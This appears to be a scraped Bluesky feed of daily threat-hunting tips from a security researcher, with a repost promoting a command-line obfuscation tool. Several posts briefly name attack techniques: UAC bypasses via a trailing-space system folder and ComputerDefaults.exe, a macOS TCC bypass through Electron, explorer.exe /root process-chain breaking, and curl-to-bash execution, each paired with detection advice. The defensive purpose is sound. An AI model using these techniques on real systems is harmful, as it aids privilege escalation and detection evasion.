Lightnews — Scholar-powered news

Reposted by Wietze

John Hammond @johnhammond.bsky.social · Jul 11

Video demo to play with ArgFuscator -- the super cool research and utility from @Wietze to obfuscate command-lines to try and evade AV or EDR detection 😎 And to test your rules if any of these crazy looking commands fly under the radar! youtu.be/6-Gbv0h7m1I

1 1 7

Wietze @wietzebeukema.nl · Jun 30

As June comes to an end, so does #HuntingTipOfTheDay. I hope you enjoyed them!

👉 Find all of them here: bsky.app/search?q=fro...

2

Wietze @wietzebeukema.nl · Jun 27

#HuntingTipOfTheDay: you know how to spot/decode Base64 or XOR in PowerShell… but what about SecureString? This AES-based encryption is native to PowerShell; attackers have been seen to use this for PowerShell obfuscation.

🔍 Hunt for known SecureString decoding commands

1 3

Wietze @wietzebeukema.nl · Jun 26

#HuntingTipOfTheDay: Stuck in vi/vim? Open a reverse shell to exit remotely 🙃

Not just a joke - you can make vi/vim run arbitrary commands, not all methods to do so are well detected.
🔍 Hunt for child processes of vi(m), especially those that are rare in your environment.

3

Wietze @wietzebeukema.nl · Jun 25

#HuntingTipOfTheDay: there are numerous open-source projects listing cyber threats. Some of these have directly ingestible indicators, which can be very helpful when threat hunting. How about:
🔵 lots-project.com + LOLBINs
🟠 hijacklibs.net + DLL write events
🟢 lolrmm.io + DNS requests

1

Wietze @wietzebeukema.nl · Jun 24

#HuntingTipOfTheDay: AppleScript via osascript is still a popular way for infostealers to get credentials/escalate access. Although some (poorly coded) updaters use this ""legitimately"", hunting for osascript referencing password dialogs might surface behaviour of interest.

Wietze @wietzebeukema.nl · Jun 23

#HuntingTipOfTheDay: USB worms are still a thing - often the initial infection happens when a user clicks a malicious shortcut on a USB device. See if you can correlate executions with .LNK files on remote drives to find possible badness.

Wietze @wietzebeukema.nl · Jun 20

#HuntingTipOfTheDay: proxy execution via ComputerDefaults.exe by setting this registry key; as it auto-elevates, it also allows for UAC bypass (!).
🔴 Executing parent is usually explorer.exe, making detection harder
🔍 Hunt for reg changes to this key
👉 lolbas-project.github.io/lolbas/Binar...

1 1

Wietze @wietzebeukema.nl · Jun 19

#HuntingTipOfTheDay: Florian is right.
🌩️ Cloud creds often linger in Environment Variables, especially on servers/dev machines
🟠 One compromised endpoint could thus lead to a full cloud breach
🔍 Hunt for exposed tokens - if you can see it, so could an attacker (well, kinda)

1

Wietze @wietzebeukema.nl · Jun 18

#HuntingTipOfTheDay: Oddvar Moe of @trustedsec.com shows how you can run a full C2 implant from Outlook - just setting a few registry keys does the trick.

Any activity concerning these registry keys should be consider suspicious.

Full story here: youtu.be/7MDHhavM5GM

1

Wietze @wietzebeukema.nl · Jun 17

Read more: afine.com/threat-of-tc...

Threat of TCC Bypasses on macOS - AFINE - digitally secure

TCC on macOS isn't just an annoying prompt—it's the last line of defense between malware and your private data. Read this article to learn why.

afine.com

2

Wietze @wietzebeukema.nl · Jun 17

#HuntingTipOfTheDay: TCC on macOS can be bypassed by triggering Electron apps' Node.js interface to run arbitrary commands
⚡ By using a Launch Daemon, you can leverage all the app's TCC permissions
🔍 Hunt for processes with ELECTRON_RUN_AS_NODE env var and unusual command lines

1 2

Wietze @wietzebeukema.nl · Jun 16

#ThreatHuntingTipOfTheDay: rundll32 can be abused in many ways lolbas-project.github.io#t1218.011

Instead of exports, ordinals can be used too. You could hunt for known bad ones, but are ordinals used legitimately that often at all?

Look for rundll32 with # on the command line to find out

Wietze @wietzebeukema.nl · Jun 13

UAC bypass can be achieved by eg moving the legit perfmon.exe and a malicious atl.dll to "c:\windows \system32". Windows is tricked into thinking this is a safe/trusted directory, meaning perfmon will launch with high integrity and your DLL will be loaded. Several other executables are vulnerable!

Wietze @wietzebeukema.nl · Jun 13

#HuntingTipOfTheDay: folders with trailing spaces can be created on Windows, and they cause trouble:
🔴 Hard to delete/rename
🟠 Can hide (malicious) content when the same folder without trailing space exists
🟡 May enable UAC bypass (see next msg)

🔍 Hunt for paths with trailing spaces - highly sus

1

Wietze @wietzebeukema.nl · Jun 12

Bonus background reading: why do hidden files start with a dot on Linux?

💠 glenda.0x46.net/articles/dot...

A lesson in shortcuts - Rob Pike

glenda.0x46.net

1

Wietze @wietzebeukema.nl · Jun 12

#HuntingTipOfTheDay: you’ll know that in Linux, files with a leading dot are hidden by default. Attackers may use this to hide payloads or frustrate forensics. Although sometimes used legitimately, you may find unexpected entries when looking for EXECUTIONS of hidden files.

1 1

Wietze @wietzebeukema.nl · Jun 11

#HuntingTipOfTheDay: a personal favourite, command-line obfuscation. Substituting or inserting special Unicode characters might allow attackers to bypass string-based detections. Look for command lines with unusual Unicode characters. Checkout ArgFuscator.net for more fun!

1 3

Wietze @wietzebeukema.nl · Jun 10

#HuntingTipOfTheDay: macOS has a built-in SSH mechanism that is disabled by default. Would you detect it if someone enables it and logs in remotely? Look for remote login events, and investigate the associated session.

1 3

Wietze @wietzebeukema.nl · Jun 9

More about this technique: www.wietzebeukema.nl/blog/save-th...

Save the Environment (Variable)

By manipulating environment variables on process level, it is possible to let trusted applications load arbitrary DLLs and execute malicious code. This post lists nearly 100 executables vulnerable to…

www.wietzebeukema.nl

Wietze @wietzebeukema.nl · Jun 9

#HuntingTipOfTheDay: Services can provide persistence. Looking for changes to their commands is common, but the lesser known Environment setting is often overlooked. It could result in stealthy DLL hijacking. Inspect any paths referenced for suspicious files.

2 2 3

Wietze @wietzebeukema.nl · Jun 6

#HuntingTipOfTheDay: explorer.exe /root,"c:/your/executable.exe" will spawn your exe from the main explorer.exe, not a new one. This breaks normal process chains. Hunt for explorer.exe with "/root", as well as explorer spawning unusual children (e.g. rundll32, mshta, powershell).

1

Wietze @wietzebeukema.nl · Jun 5

#HuntingTipOfTheDay: a common way to execute malicious code on Linux is to download a script via curl/wget and pipe the result into a shell process like bash. Hunt for curl/wget executions followed by an interactive shell within seconds, both having the same parent process.

1

Wietze @wietzebeukema.nl · Jun 4

#HuntingTipOfTheDay: You have probably heard of .bash_profile and .zshrc, but are you familiar with PowerShell's version of it? Attackers might use this for persistence; monitor modifications of profiles by unexpected processes, and analyse existing files for anomalies.

3 2 3

Wietze @wietzebeukema.nl · Jun 3

#ThreatHuntingTipOfTheDay: Malicious DMGs/PKGs are currently the most popular way for macOS infostealers to get foothold. Use macOS’s kMDItemWhereFroms extended attribute to see origins of downloaded DMG/PKGs; investigate ones that are rare across your IT estate.

1